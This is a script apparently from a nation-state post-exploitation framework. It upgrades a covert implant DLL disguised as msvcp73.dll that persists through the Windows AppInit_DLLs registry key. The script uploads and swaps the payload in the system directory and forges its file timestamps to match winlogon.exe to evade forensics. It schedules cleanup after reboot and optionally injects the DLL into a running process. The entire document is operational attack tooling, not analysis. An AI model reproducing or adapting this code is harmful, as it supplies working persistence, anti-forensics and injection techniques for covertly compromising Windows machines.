@include "_Paths.dsi"; @include "_Processes.dsi"; @include "_Versions.dsi"; @include "windows/_RegistryIncludes.dsi"; @echo off; @disablewow64 on; if ($argc != 3) { echo("* Invalid parmeters", ERROR); echo(); echo("Usage: $argv[0] "); return false; } string $localFile = $argv[1]; string $procName = $argv[2]; string $arch; _GetArch($arch); # get install name string $payloadName = "msvcp73.dll"; string $payloadLoadName = "msvcp74.dll"; string $payloadDeleteName = "msvcp73d.dll"; if (!GetInput("PC DLL install name", $payloadName, $payloadName) || !GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) || !GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName)) { echo("* Failed to get PC names", ERROR); return false; } string $payloadRegex = $payloadName; RegExSub("[.]", "\\\\.", $payloadRegex); # get the system path string $sysPath; if (!_GetSystemPath($sysPath)) { echo("* Failed to get system path", ERROR); return false; } # get the AppInit value string $origAppInitValue; if (!_GetRegistryValue("L", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "AppInit_DLLs", $origAppInitValue) || !defined($origAppInitValue)) { $origAppInitValue = ""; } if (!RegExMatch($payloadRegex, $origAppInitValue)) { echo("* Failed to find $payloadName in AppInit key", ERROR); return false; } # get the process id for injection int $id; if (prompt("Do you want to perform injection (for instant-grat)?")) { if (StrLen($procName) > 0) { if (!_FindProcessOnList($procName, $id) || !defined($id)) { echo("* Failed to find $procName", ERROR); } } # make sure the user wants to keep going if we don't have a process if (!defined($id)) { echo("No process for injection", ERROR); if (!prompt("Continue?")) { return false; } } } # upload the new file echo "Uploading new PC"; if (!`put "$localFile" -name "$sysPath\\$payloadLoadName" -permanent`) { echo(" FAILED", ERROR); pause; return false; } echo(" FINISHED", GOOD); # move the old file echo "Moving old PC"; if (!`move "$sysPath\\$payloadName" "$sysPath\\$payloadDeleteName"`) { echo(" FAILED", ERROR); echo "Performing recovery"; if (!`delete -file "$sysPath\\$payloadLoadName"`) { echo(" FAILED", ERROR); } else { echo(" RECOVERED", GOOD); } pause; return false; } echo(" FINISHED", GOOD); # copy the new file to it's final location echo "Copying new PC to permanent location"; if (!`copy "$sysPath\\$payloadLoadName" "$sysPath\\$payloadName"`) { echo(" FAILED", ERROR); echo "Performing recovery"; if (!`move "$sysPath\\$payloadDeleteName" "$sysPath\\$payloadName"` || !`delete -file "$sysPath\\$payloadLoadName"`) { echo(" FAILED", ERROR); } else { echo(" RECOVERED", GOOD); } pause; return false; } echo(" FINISHED", GOOD); # matchtimes on the files string $matchName = "user.exe"; if ($arch == "x64") { $matchName = "winlogon.exe"; } echo "Matching filetimes with $matchName"; if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadName"` || !`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadLoadName"` || !`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadDeleteName"`) { echo(" FAILED", WARNING); pause; # continue... } else { echo(" FINISHED", GOOD); } # mark the temp files for deletion `delete -file "$sysPath\\$payloadLoadName" -afterreboot`; `delete -file "$sysPath\\$payloadDeleteName" -afterreboot`; if (defined($id)) { # inject the DLL echo "Injecting DLL"; if (!`injectdll -library $payloadLoadName -id $id`) { echo(" FAILED", ERROR); } else { echo(" INJECTED", GOOD); } } echo "Upgrade Finished"; echo "AppInit : '$origAppInitValue'"; pause; return true;